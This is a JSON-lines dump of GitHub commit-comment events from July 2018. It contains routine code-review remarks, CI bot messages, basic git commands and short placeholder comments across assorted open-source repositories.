{"id":"7934310060","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634348,"position":5,"line":68,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/main/responses/ResponsesPresenter.kt","commit_id":"b03e112dbbe2b102f2092b3493f559ae2e4190d3","created_at":"2018-07-08T17:40:37Z","updated_at":"2018-07-08T17:40:37Z","author_association":"OWNER","body":"Эт лучше делать через `sendToView { it.onItemClicked(item) }` - иначе, если вьюха не приаттачена, данные в нее переданы не будут (при `sendToView` команда будет записана в буфер и прокинута во вьюху при аттаче). Ошибка на самом деле моя, еще издавна тянется - в остальных местах тоже везде отрефакторить потом надо."}},"created_at":"2018-07-08T17:40:37Z"}
{"id":"7934310187","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29634349,"position":null,"line":null,"path":null,"commit_id":"c9ac7870843854dcec7b003116f708f6ed127f71","created_at":"2018-07-08T17:40:42Z","updated_at":"2018-07-08T17:40:42Z","author_association":"OWNER","body":"buttons are now also always interact-able and will stop the current game without throwing any error"}},"created_at":"2018-07-08T17:40:42Z"}
{"id":"7934311473","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29634354,"position":null,"line":null,"path":null,"commit_id":"c9ac7870843854dcec7b003116f708f6ed127f71","created_at":"2018-07-08T17:41:38Z","updated_at":"2018-07-08T17:41:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Error if game is button is clicked while animating!](https://trello.com/c/He53WvbL/31-error-if-game-is-button-is-clicked-while-animating)"}},"created_at":"2018-07-08T17:41:38Z"}
{"id":"7934311503","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634355,"position":30,"line":46,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/classification/WorkClassificationFragment.kt","commit_id":"b03e112dbbe2b102f2092b3493f559ae2e4190d3","created_at":"2018-07-08T17:41:39Z","updated_at":"2018-07-08T17:41:39Z","author_association":"OWNER","body":"Это просто логи, можно их спокойно выпиливать при добавлении реального функционала."}},"created_at":"2018-07-08T17:41:39Z"}
{"id":"7934311990","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29634357,"position":null,"line":null,"path":null,"commit_id":"51b04fa63d249f0149b157ee251c5c842df6434e","created_at":"2018-07-08T17:42:04Z","updated_at":"2018-07-08T17:42:04Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ShapesArray out of index exception](https://trello.com/c/G75wkmS0/25-shapesarray-out-of-index-exception)"}},"created_at":"2018-07-08T17:42:04Z"}
{"id":"7934312468","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634359,"position":12,"line":15,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/classification/WorkClassificationPresenter.kt","commit_id":"b03e112dbbe2b102f2092b3493f559ae2e4190d3","created_at":"2018-07-08T17:42:25Z","updated_at":"2018-07-08T17:42:25Z","author_association":"OWNER","body":"Идиоматичнее `= arrayListOf()` или что-то подобное"}},"created_at":"2018-07-08T17:42:25Z"}
{"id":"7934313597","type":"CommitCommentEvent","actor":{"login":"nlct"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29634361,"position":26,"line":65,"path":"docs/chapters/building.tex","commit_id":"b4b0ca4896a848b76bdb68d94a827937e70b60fd","created_at":"2018-07-08T17:43:17Z","updated_at":"2018-07-08T17:43:17Z","author_association":"COLLABORATOR","body":"@cereda I'll see if I can work something out. I think we can pull some of the information in the next paragraph earlier. :smiley: "}},"created_at":"2018-07-08T17:43:17Z"}
{"id":"7934314461","type":"CommitCommentEvent","actor":{"login":"praveenkalluru"},"repo":{"name":"praveenkalluru/sriman"},"payload":{"comment":{"id":29634364,"position":4,"line":5,"path":"AbstractCommandController/src/main/webapp/WEB-INF/jsp/result.jsp","commit_id":"8e532efd493ab3bd039a92fd2018fb961d697283","created_at":"2018-07-08T17:43:56Z","updated_at":"2018-07-08T17:43:56Z","author_association":"OWNER","body":";llkll;k;l"}},"created_at":"2018-07-08T17:43:56Z"}
{"id":"7934314713","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29634365,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-08T17:44:08Z","updated_at":"2018-07-08T17:44:08Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-08T17:44:08Z"}
{"id":"7934315302","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29634366,"position":null,"line":null,"path":null,"commit_id":"eccf1d3d8d0c506611a1445425acbfb6f7638cbb","created_at":"2018-07-08T17:44:34Z","updated_at":"2018-07-08T17:44:34Z","author_association":"OWNER","body":"This sounds like a good idea.\r\n\r\nI have another question: I try to use a call to search in playout, dependent on root depth. If I do, then the engine eventually disconnect from cutechess, although bench and cli operations work without issues.\r\n\r\nDo you have any ideas? "}},"created_at":"2018-07-08T17:44:34Z"}
{"id":"7934316623","type":"CommitCommentEvent","actor":{"login":"dedChar"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29634370,"position":44,"line":32,"path":"state.js","commit_id":"96971d0103b7dd49b2136d98216c83b2418f41c6","created_at":"2018-07-08T17:45:34Z","updated_at":"2018-07-08T17:45:34Z","author_association":"COLLABORATOR","body":"doesn't it need to be `this.running`? don't see any `running` variable defined in this scope"}},"created_at":"2018-07-08T17:45:34Z"}
{"id":"7934316802","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634371,"position":13,"line":21,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/overview/WorkOverviewFragment.kt","commit_id":"b03e112dbbe2b102f2092b3493f559ae2e4190d3","created_at":"2018-07-08T17:45:42Z","updated_at":"2018-07-08T17:45:42Z","author_association":"OWNER","body":"`@JvmField + var` нужны, когда к этому полю будут обращения из Java-кода. Если есть только котлин - можно заменить на `lateinit var` - это означает, что переменная будет проинициализирована позже и != null. Butterknife такое нормально переваривает."}},"created_at":"2018-07-08T17:45:42Z"}
{"id":"7934316966","type":"CommitCommentEvent","actor":{"login":"nik0"},"repo":{"name":"Dafang-Hacks/Audio"},"payload":{"comment":{"id":29634372,"position":4,"line":24,"path":"AudioPlay/audioplay.c","commit_id":"eefef039acb6fb0ca5a39202f4b0317ea5f765a4","created_at":"2018-07-08T17:45:49Z","updated_at":"2018-07-08T17:45:49Z","author_association":"COLLABORATOR","body":"No problem we all learning ...\nOk I wait before putting this to the binary repo ...\n\nLe dim. 8 juil. 2018 à 19:40, Humberto Alves <notifications@github.com> a\nécrit :\n\n> I didn't know about logcat 🤐 Sorry, I'm still kinda a noob at this...\n> I'm going to remove it, then... I'll make a pull request later today or\n> tomorrow, maybe with other improvements, after my experiments\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Dafang-Hacks/Audio/commit/eefef039acb6fb0ca5a39202f4b0317ea5f765a4#commitcomment-29634343>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABx_hp2BKmZ7lgCSB9dPv7OtDd8XgLF2ks5uEkP2gaJpZM4VGzad>\n> .\n>\n"}},"created_at":"2018-07-08T17:45:49Z"}
{"id":"7934317489","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29634373,"position":26,"line":65,"path":"docs/chapters/building.tex","commit_id":"b4b0ca4896a848b76bdb68d94a827937e70b60fd","created_at":"2018-07-08T17:46:11Z","updated_at":"2018-07-08T17:46:11Z","author_association":"OWNER","body":"Thanks! :duck: "}},"created_at":"2018-07-08T17:46:11Z"}
{"id":"7934317848","type":"CommitCommentEvent","actor":{"login":"valiant1x"},"repo":{"name":"valiant1x/intense-browser-extension"},"payload":{"comment":{"id":29634374,"position":18,"line":110,"path":"proxy_error_handler.js","commit_id":"70c38496491d54bfd566e3c9f0087ba5466d0a14","created_at":"2018-07-08T17:46:26Z","updated_at":"2018-07-08T17:46:26Z","author_association":"OWNER","body":"@alfasoftpt consider using unicode checkmark ✔instead of a '0' for the text on the green box"}},"created_at":"2018-07-08T17:46:26Z"}
{"id":"7934318320","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29634376,"position":37,"line":545,"path":"lib/Backends/OpenCL/OpenCL.cpp","commit_id":"932629e70849d2baf8d88790871e02b8ddd263f3","created_at":"2018-07-08T17:46:47Z","updated_at":"2018-07-08T17:46:47Z","author_association":"NONE","body":"This block of code looks pretty long. I think a couple of things could be done here:\r\n- May be all/part of it could be moved into a separate function, especially if other quantized operations would need something similar.\r\n- We pass a lot of kernel parameters here for each quantized argument: offset, pre, post, scale. May be pre/post should be computed inside the kernel? It is probably a rather quick computation?\r\n  Or, we pass all of them, but introduce a type QuantizationParams in OpenCL and CPP. This type would have 4 fields: offset, pre, post, scale. And you'd pass these structs as arguments. This may make the code smaller."}},"created_at":"2018-07-08T17:46:47Z"}
{"id":"7934319469","type":"CommitCommentEvent","actor":{"login":"rajukumarpatel"},"repo":{"name":"rajukumarpatel/rajufile"},"payload":{"comment":{"id":29634380,"position":null,"line":null,"path":null,"commit_id":"f333193a9d0ec0b8af85a0fe228cc68dd34b272f","created_at":"2018-07-08T17:47:40Z","updated_at":"2018-07-08T17:47:40Z","author_association":"OWNER","body":"git init\r\ntouch filename\r\ngit status\r\ngit add filename\r\ngit log\r\n\r\ngit config  --global user.name \"rajukumarpatel\"\r\ngit config  --global user.email \"rajukumarpatel669@gmail.com\"\r\ngit commit -m \"move local repository to central repositry\"\r\ngit clone path\r\ngit push\r\n"}},"created_at":"2018-07-08T17:47:40Z"}
{"id":"7934319531","type":"CommitCommentEvent","actor":{"login":"jaseweston"},"repo":{"name":"facebookresearch/ParlAI"},"payload":{"comment":{"id":29634381,"position":1,"line":99,"path":"parlai/core/beam.py","commit_id":"8adedd15069b1a1b7752a336bb594f6907e07ec5","created_at":"2018-07-08T17:47:42Z","updated_at":"2018-07-08T17:47:42Z","author_association":"CONTRIBUTOR","body":"going to move or no?"}},"created_at":"2018-07-08T17:47:42Z"}
{"id":"7934319666","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29634383,"position":44,"line":32,"path":"state.js","commit_id":"96971d0103b7dd49b2136d98216c83b2418f41c6","created_at":"2018-07-08T17:47:49Z","updated_at":"2018-07-08T17:47:49Z","author_association":"OWNER","body":"Yeah it does. Gonna fix"}},"created_at":"2018-07-08T17:47:49Z"}
{"id":"7934320304","type":"CommitCommentEvent","actor":{"login":"danlyke"},"repo":{"name":"mpogue2/SquareDesk"},"payload":{"comment":{"id":29634384,"position":null,"line":null,"path":null,"commit_id":"59c3fdf54eab989dd31f882adf7a8e54c010d5ef","created_at":"2018-07-08T17:48:18Z","updated_at":"2018-07-08T17:48:18Z","author_association":"COLLABORATOR","body":"Oh, right, never mind. Yeah, looks okay."}},"created_at":"2018-07-08T17:48:18Z"}
{"id":"7934320703","type":"CommitCommentEvent","actor":{"login":"10Seeker10"},"repo":{"name":"10Seeker10/Brutinho"},"payload":{"comment":{"id":29634386,"position":null,"line":null,"path":null,"commit_id":"d193c4c255d623cb041b0aca188c8676d9383c07","created_at":"2018-07-08T17:48:36Z","updated_at":"2018-07-08T17:48:36Z","author_association":"OWNER","body":"Descrição do programa"}},"created_at":"2018-07-08T17:48:36Z"}
{"id":"7934321656","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634387,"position":14,"line":54,"path":"app/src/main/kotlin/ru/fantlab/android/ui/widgets/FontTextView.kt","commit_id":"b03e112dbbe2b102f2092b3493f559ae2e4190d3","created_at":"2018-07-08T17:49:20Z","updated_at":"2018-07-08T17:49:20Z","author_association":"OWNER","body":"Не уверен, что это действительно хорошая идея - инкапсулировать внешнее по отношению к TextView поведение (его расположение) в самом классе. Возможно, лучшим вариантом будет extension-метод в утилитном классе `View.kt`, например:\r\n```\r\nfun TextView.setLevel(level: Int) {\r\n    val mlp = getLayoutParams() as ViewGroup.MarginLayoutParams\r\n    mlp.setMargins(ViewHelper.toPx(context, level * 20) , 0, 0, 0)\r\n}\r\n```"}},"created_at":"2018-07-08T17:49:20Z"}
{"id":"7934321968","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29634388,"position":40,"line":122,"path":"tests/unittests/OperatorTest.cpp","commit_id":"932629e70849d2baf8d88790871e02b8ddd263f3","created_at":"2018-07-08T17:49:33Z","updated_at":"2018-07-08T17:49:33Z","author_association":"NONE","body":"The test looks reasonable. Of course, we want to add a correctness check as the next step. For that, we want to construct the same model, but run in on two different backends: OpenCL and Interpreter. And then compare the values of output variables."}},"created_at":"2018-07-08T17:49:33Z"}
{"id":"7934322755","type":"CommitCommentEvent","actor":{"login":"Anurak2528"},"repo":{"name":"MetaMask/metamask-extension"},"payload":{"comment":{"id":29634389,"position":6,"line":51,"path":"app/404.html","commit_id":"8a571ece367f089e9cfef45fed925736c5858e82","created_at":"2018-07-08T17:50:09Z","updated_at":"2018-07-08T17:50:09Z","author_association":"NONE","body":"Anurak2528"}},"created_at":"2018-07-08T17:50:09Z"}
{"id":"7934322851","type":"CommitCommentEvent","actor":{"login":"afk1949"},"repo":{"name":"afk1949/hello-world"},"payload":{"comment":{"id":29634390,"position":null,"line":null,"path":null,"commit_id":"f51784fa5f16bec2c39dcc26794cfd595c2d3de4","created_at":"2018-07-08T17:50:12Z","updated_at":"2018-07-08T17:50:12Z","author_association":"OWNER","body":"the villains of marvel are way too predictable"}},"created_at":"2018-07-08T17:50:12Z"}
{"id":"7934324704","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634401,"position":18,"line":18,"path":"app/src/main/res/layouts/row_layouts/layout/work_classification_section.xml","commit_id":"b03e112dbbe2b102f2092b3493f559ae2e4190d3","created_at":"2018-07-08T17:51:37Z","updated_at":"2018-07-08T17:51:37Z","author_association":"OWNER","body":"Лучше сырые ресурсы заменять все-таки на ссылки. Такие размеры там точно есть"}},"created_at":"2018-07-08T17:51:37Z"}
{"id":"7934326719","type":"CommitCommentEvent","actor":{"login":"afk1949"},"repo":{"name":"afk1949/hello-world"},"payload":{"comment":{"id":29634405,"position":null,"line":null,"path":null,"commit_id":"f51784fa5f16bec2c39dcc26794cfd595c2d3de4","created_at":"2018-07-08T17:53:06Z","updated_at":"2018-07-08T17:53:06Z","author_association":"OWNER","body":"yeah thats correct\r\n"}},"created_at":"2018-07-08T17:53:06Z"}
{"id":"7934327037","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29634406,"position":27,"line":109,"path":"tests/unittests/OperatorTest.cpp","commit_id":"932629e70849d2baf8d88790871e02b8ddd263f3","created_at":"2018-07-08T17:53:20Z","updated_at":"2018-07-08T17:53:20Z","author_association":"NONE","body":"You test the \"add\" here. But as far as I understand, you now support virtually all binary data parallel operations, i.e. mul, div, sub, min, max, etc.\r\n\r\nIt may be a good idea to \"parameterize\" this test somehow by operations that should be tested. This could be done e.g. by having an outer loop including the body of the whole function. That loop iterates over e.g. a vector like this:\r\n\r\n```c++\r\nstd::vector<glow::Kinded::Kind> ops{\r\n      glow::Kinded::Kind::ElementAddInstKind,\r\n      glow::Kinded::Kind::ElementSubInstKind,\r\n      glow::Kinded::Kind::ElementMulInstKind,\r\n      glow::Kinded::Kind::ElementDivInstKind,\r\n      glow::Kinded::Kind::ElementMinInstKind,\r\n      glow::Kinded::Kind::ElementMaxInstKind,\r\n      // Add more operations here.\r\n  };\r\n```"}},"created_at":"2018-07-08T17:53:20Z"}
{"id":"7934327346","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634407,"position":5,"line":61,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/overview/WorkOverviewFragment.kt","commit_id":"6dac43a7bf9f3be88117fdada3e65ca2f86692bb","created_at":"2018-07-08T17:53:32Z","updated_at":"2018-07-08T17:53:32Z","author_association":"OWNER","body":"Сложно читается :) Лучше такое через обычный StringBuilder решать - он на то и был придуман"}},"created_at":"2018-07-08T17:53:32Z"}
{"id":"7934327578","type":"CommitCommentEvent","actor":{"login":"cdaringe"},"repo":{"name":"graphile/postgraphile"},"payload":{"comment":{"id":29634409,"position":19,"line":204,"path":"src/interfaces.ts","commit_id":"20a50fe5b8ff8425cadc2e28de01209aff502137","created_at":"2018-07-08T17:53:43Z","updated_at":"2018-07-08T17:53:43Z","author_association":"NONE","body":"no change to these types, just migrated them up as they needed to be xreffed more often"}},"created_at":"2018-07-08T17:53:43Z"}
{"id":"7934328200","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29634414,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-08T17:54:13Z","updated_at":"2018-07-08T17:54:13Z","author_association":"OWNER","body":"commit comment"}},"created_at":"2018-07-08T17:54:13Z"}
{"id":"7934330160","type":"CommitCommentEvent","actor":{"login":"10Seeker10"},"repo":{"name":"10Seeker10/Recon_ME"},"payload":{"comment":{"id":29634416,"position":null,"line":null,"path":null,"commit_id":"efeee205d9e39cc9cae3ed86d419f817b6e9e084","created_at":"2018-07-08T17:55:33Z","updated_at":"2018-07-08T17:55:33Z","author_association":"OWNER","body":"Sobre o programa"}},"created_at":"2018-07-08T17:55:33Z"}
{"id":"7934331646","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29634419,"position":28,"line":110,"path":"tests/unittests/OperatorTest.cpp","commit_id":"932629e70849d2baf8d88790871e02b8ddd263f3","created_at":"2018-07-08T17:56:39Z","updated_at":"2018-07-08T17:56:39Z","author_association":"NONE","body":"And this `createSave` in the parameterized version becomes:\r\n```c++\r\nNode *operation{nullptr};\r\n    switch (op) {\r\n    case glow::Kinded::Kind::ElementAddInstKind:\r\n      operation = F->createAdd(\"add\", ...);\r\n      break;\r\n    case glow::Kinded::Kind::ElementSubInstKind:\r\n      ....\r\n    };\r\n```\r\nBasically, you create the node that does the actual operation based on the parameter.\r\n\r\nIt could be that there is another, more `gtest`-specific way to parameterize the tests, e.g. similar to the INSTANTIATE_TEST_CASE_P used for defining which backends should be used. Such an approach may be even cleaner."}},"created_at":"2018-07-08T17:56:39Z"}
{"id":"7934333839","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29634421,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-08T17:58:20Z","updated_at":"2018-07-08T17:58:20Z","author_association":"OWNER","body":"https://github.com/kapillamba4/permalink-bot/blob/master/CODE_OF_CONDUCT.md"}},"created_at":"2018-07-08T17:58:20Z"}
{"id":"7934334249","type":"CommitCommentEvent","actor":{"login":"rst0git"},"repo":{"name":"adrianreber/criu"},"payload":{"comment":{"id":29634422,"position":null,"line":null,"path":null,"commit_id":"bca5ad7e98104705a5d65ee85fa83078cf94c8c2","created_at":"2018-07-08T17:58:37Z","updated_at":"2018-07-08T17:58:37Z","author_association":"NONE","body":"Awesome!!!\r\n\r\nThere is also an `#include <linux/aio_abi.h>` in `test/zdtm/static/aio01.c`.\r\nShould we remove this one as well?"}},"created_at":"2018-07-08T17:58:37Z"}
{"id":"7934335461","type":"CommitCommentEvent","actor":{"login":"paladox"},"repo":{"name":"miraheze/mw-config"},"payload":{"comment":{"id":29634423,"position":null,"line":null,"path":null,"commit_id":"b9dea600519b4e82ed3c23dff1f8ce76c2eb0a76","created_at":"2018-07-08T17:59:32Z","updated_at":"2018-07-08T17:59:32Z","author_association":"MEMBER","body":"@JohnFLewis order?"}},"created_at":"2018-07-08T17:59:32Z"}
{"id":"7934336551","type":"CommitCommentEvent","actor":{"login":"jbednar"},"repo":{"name":"pyviz/nbsite"},"payload":{"comment":{"id":29634431,"position":null,"line":null,"path":null,"commit_id":"2b1eb7f5d983a491aad575c6f0afe6aadf34ad98","created_at":"2018-07-08T18:00:17Z","updated_at":"2018-07-08T18:00:17Z","author_association":"CONTRIBUTOR","body":"Can you explain?"}},"created_at":"2018-07-08T18:00:17Z"}
{"id":"7934337642","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29634434,"position":null,"line":null,"path":null,"commit_id":"a1bf97129d7298d914d0d3d8e73f06650fb40959","created_at":"2018-07-08T18:00:57Z","updated_at":"2018-07-08T18:00:57Z","author_association":"COLLABORATOR","body":"Puzzle `860-c0f3bfe5` discovered in   [`src/main/java/com/zerocracy/pmo/Speed.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/Speed.java)   and submitted as #1381. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-08T18:00:57Z"}
{"id":"7934338939","type":"CommitCommentEvent","actor":{"login":"cdaringe"},"repo":{"name":"graphile/postgraphile"},"payload":{"comment":{"id":29634436,"position":61,"line":209,"path":"src/interfaces.ts","commit_id":"20a50fe5b8ff8425cadc2e28de01209aff502137","created_at":"2018-07-08T18:01:51Z","updated_at":"2018-07-08T18:01:51Z","author_association":"NONE","body":"i restore this in 8b8c490, however, it came with a type cast hack.  i  don't know how to return an instance of `HttpRequestHandler` that only implements _one_ of the signatures.  as you can see in the 2 LOC 8b8c490, i had to cast to get it to take w/ the Koa signature."}},"created_at":"2018-07-08T18:01:51Z"}
{"id":"7934340789","type":"CommitCommentEvent","actor":{"login":"berhemTaher"},"repo":{"name":"berhemTaher/hmm"},"payload":{"comment":{"id":29634440,"position":null,"line":null,"path":null,"commit_id":"492b6e83b8ddcc0d7c14b1ede6644cc735e4b746","created_at":"2018-07-08T18:03:16Z","updated_at":"2018-07-08T18:03:16Z","author_association":"OWNER","body":"hh### hhhhhh\r\n> hhhhhh\r\n"}},"created_at":"2018-07-08T18:03:16Z"}
{"id":"7934343117","type":"CommitCommentEvent","actor":{"login":"karolsw3"},"repo":{"name":"Galactim/Sudoku"},"payload":{"comment":{"id":29634442,"position":null,"line":null,"path":null,"commit_id":"c356bbb12b333d5d3068519ecf2029d3922a8561","created_at":"2018-07-08T18:05:01Z","updated_at":"2018-07-08T18:05:01Z","author_association":"MEMBER","body":"That was unintended, my fault."}},"created_at":"2018-07-08T18:05:01Z"}
{"id":"7934343194","type":"CommitCommentEvent","actor":{"login":"gupi125"},"repo":{"name":"gupi125/gupi125.github.io"},"payload":{"comment":{"id":29634443,"position":null,"line":null,"path":null,"commit_id":"9fe01d2bdad294a8c7018d4e7182a653e0b1c53c","created_at":"2018-07-08T18:05:04Z","updated_at":"2018-07-08T18:05:04Z","author_association":"OWNER","body":"asm2"}},"created_at":"2018-07-08T18:05:04Z"}
{"id":"7934345736","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29634447,"position":97,"line":207,"path":"boot/freeldr/bootsect/btrfs.S","commit_id":"c5eec2c78fff91d4af3c886b7dec364cfd702e54","created_at":"2018-07-08T18:06:52Z","updated_at":"2018-07-08T18:06:52Z","author_association":"NONE","body":"trailing whitespace"}},"created_at":"2018-07-08T18:06:52Z"}
{"id":"7934346385","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29634448,"position":null,"line":null,"path":null,"commit_id":"1e050d3db97076317796d52ef60f97d3ae991b74","created_at":"2018-07-08T18:07:18Z","updated_at":"2018-07-08T18:07:18Z","author_association":"CONTRIBUTOR","body":"@ryanbr new domain `vidtodo.me` and `vidtodo.pro`"}},"created_at":"2018-07-08T18:07:18Z"}
{"id":"7934348971","type":"CommitCommentEvent","actor":{"login":"coupledesigntech"},"repo":{"name":"coupledesigntech/Couple-Design-Tech"},"payload":{"comment":{"id":29634454,"position":null,"line":null,"path":null,"commit_id":"5e69df47f6063fccbb7656a6ed3ad37787f12c71","created_at":"2018-07-08T18:09:06Z","updated_at":"2018-07-08T18:09:06Z","author_association":"OWNER","body":"Verificado"}},"created_at":"2018-07-08T18:09:06Z"}
{"id":"7934349064","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29634455,"position":null,"line":null,"path":null,"commit_id":"0dbca8c016b8ffde6a750dcb9aa6000fccb57df7","created_at":"2018-07-08T18:09:10Z","updated_at":"2018-07-08T18:09:10Z","author_association":"COLLABORATOR","body":"<h3>core/TextArea: Accept inputRef prop (#2648)</h3>\n\nPreview: <strong><a href='https://17909-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17909-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17909-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-08T18:09:10Z"}
{"id":"7934349129","type":"CommitCommentEvent","actor":{"login":"MASHinfo"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29634456,"position":null,"line":null,"path":null,"commit_id":"e6f78ae943c95dcff114b538bf318a688338c265","created_at":"2018-07-08T18:09:13Z","updated_at":"2018-07-08T18:09:13Z","author_association":"CONTRIBUTOR","body":"> namcos2.cpp : Add notes, demote with MACHINE_IMPERFECT_GRAPHICS because tilemap and ROZ issue\r\nDid you forgot to add MACHINE_IMPERFECT_GRAPHICS to drivers/namcos2.cpp ?"}},"created_at":"2018-07-08T18:09:13Z"}
{"id":"7934350297","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29634457,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-08T18:10:08Z","updated_at":"2018-07-08T18:10:08Z","author_association":"OWNER","body":"https://github.com/kapillamba4/permalink-bot/blob/master/CODE_OF_CONDUCT.md "}},"created_at":"2018-07-08T18:10:08Z"}
{"id":"7934351606","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29634461,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-08T18:11:05Z","updated_at":"2018-07-08T18:11:05Z","author_association":"OWNER","body":"https://github.com/kapillamba4/permalink-bot/blob/master/CODE_OF_CONDUCT.md "}},"created_at":"2018-07-08T18:11:05Z"}
{"id":"7934352595","type":"CommitCommentEvent","actor":{"login":"cavariux"},"repo":{"name":"cavariux/figures"},"payload":{"comment":{"id":29634462,"position":null,"line":null,"path":null,"commit_id":"4eb161c98d9b4aaad9c98d41b8ec63fb8e79bd5a","created_at":"2018-07-08T18:11:51Z","updated_at":"2018-07-08T18:11:51Z","author_association":"OWNER","body":"@Yardanico thanks, pushed a commit to fix it"}},"created_at":"2018-07-08T18:11:51Z"}
{"id":"7934353075","type":"CommitCommentEvent","actor":{"login":"MaximillianJLowe"},"repo":{"name":"MaximillianJLowe/intro-to-react"},"payload":{"comment":{"id":29634465,"position":null,"line":null,"path":null,"commit_id":"e0da1b7a64514763064a4c236a84ce68d6471d06","created_at":"2018-07-08T18:12:13Z","updated_at":"2018-07-08T18:12:13Z","author_association":"OWNER","body":"remove stub \"hello world\""}},"created_at":"2018-07-08T18:12:13Z"}
{"id":"7934353508","type":"CommitCommentEvent","actor":{"login":"Amplifiable2"},"repo":{"name":"Amplifiable2/HyperiumLauncher"},"payload":{"comment":{"id":29634467,"position":null,"line":null,"path":null,"commit_id":"6e52aa898803513907c96ac18ce0c5f00feeb70d","created_at":"2018-07-08T18:12:32Z","updated_at":"2018-07-08T18:12:32Z","author_association":"OWNER","body":"also event stuff"}},"created_at":"2018-07-08T18:12:32Z"}
